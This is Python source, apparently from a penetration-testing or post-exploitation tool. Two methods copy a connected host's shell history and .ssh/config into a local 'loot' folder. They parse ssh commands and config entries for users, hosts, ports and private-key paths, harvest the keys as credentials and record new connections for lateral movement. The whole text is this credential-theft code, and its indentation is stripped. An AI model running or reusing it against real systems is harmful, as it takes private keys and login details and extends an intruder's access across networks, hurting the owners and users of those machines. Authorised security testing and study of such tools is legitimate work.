async def gatherFromHistory(self, historyFile):
lootFolder = os.path.join(self.wspaceFolder, "loot")
filename = str(self.connection.getEndpoint()).replace(
":", "-") + "_" + str(
self.connection.getUser()) + "_" + historyFile.replace(
"/", "_")
filepath = os.path.join(lootFolder, filename)
try:
await asyncssh.scp((self.socket, historyFile), filepath)
except Exception as e:
print(e)
return None
with open(filepath, "r", errors="ignore") as dledFile:
data = dledFile.read()
lines = data.splitlines()
for line in lines:
if re.search(r'^ *ssh ', line):
option = ""
words = line.split()
host = False
port = None
user = None
identity = None
for i in range(1, len(words)):
if option != "":
if option == "identity":
identity = words[i]
if identity[:2] == '~/':
identity = identity[2:]
elif option == "port":
port = words[i]
option = ""
elif words[i][0] == "-":
if words[i] == "-i":
option = "identity"
elif words[i] == "-p":
option = "port"
else:
option = words[i]
elif not host:
if '@' in words[i]:
user, hostname = words[i].split("@", 1)
else:
hostname = words[i]
host = True
if not host:
continue
endpoints = await self.hostnameToIP(hostname, port)
if user is not None:
user = User(user)
if not self.connection.inScope():
user.unscope()
if user.getId() is None:
user.setFound(self.connection.getEndpoint())
user.save()
self.newUsers.append(user)
if identity is not None:
identity = await self.getKeyToCreds(identity, ".")
if user is not None and identity is not None:
for endpoint in endpoints:
conn = Connection(endpoint, user, identity)
conn.save()
self.newConnections.append(conn)
async def gatherFromConfig(self):
lootFolder = os.path.join(self.wspaceFolder, "loot")
filename = str(self.connection.getEndpoint()).replace(
":", "-") + "_" + str(self.connection.getUser()) + "_.ssh_config"
filepath = os.path.join(lootFolder, filename)
try:
await asyncssh.scp((self.socket, ".ssh/config"), filepath)
except Exception as e:
return None
with open(filepath, 'r', errors='replace') as f:
data = f.read()
lines = data.split('\n')
curHost = None
for line in lines:
if line == '':
continue
if line[:5].lower() == "Host ".lower():
if curHost != None and curHost["name"] != "*":
if "host" in curHost.keys():
host = curHost["host"]
else:
host = curHost["name"]
if "port" in curHost.keys():
port = curHost["port"]
else:
port = None
endpoints = await self.hostnameToIP(host, port)
user = None
identity = None
if "user" in curHost.keys():
user = User(curHost["user"])
if not self.connection.inScope():
user.unscope()
if user.getId() is None:
user.setFound(self.connection.getEndpoint())
user.save()
self.newUsers.append(user)
if "identity" in curHost.keys():
identity = await self.getKeyToCreds(
curHost["identity"], ".")
if user is not None and identity is not None:
for endpoint in endpoints:
conn = Connection(endpoint, user, identity)
conn.save()
self.newConnections.append(conn)
curHost = {}
curHost["name"] = line.split()[1]
else:
[key, val] = line.strip().split(' ', 1)
key = key.lower()
if key == "user":
curHost['user'] = val
elif key == "port":
curHost['port'] = val
elif key == "hostname":
curHost['host'] = val
elif key == "identityfile":
if val[:2] == '~/':
val = val[2:]
curHost['identity'] = val
if curHost != None and curHost["name"] != "*":
print("Not None")
if "host" in curHost.keys():
host = curHost["host"]
else:
host = curHost["name"]
if "port" in curHost.keys():
port = curHost["port"]
else:
port = None
endpoints = await self.hostnameToIP(host, port)
user = None
identity = None
if "user" in curHost.keys():
user = User(curHost["user"])
if not self.connection.inScope():
user.unscope()
if user.getId() is None:
user.setFound(self.connection.getEndpoint())
self.newUsers.append(user)
user.save()
if "identity" in curHost.keys():
identity = await self.getKeyToCreds(curHost["identity"], ".")
if user is not None and identity is not None:
for endpoint in endpoints:
conn = Connection(endpoint, user, identity)
conn.save()
self.newConnections.append(conn)
print("End")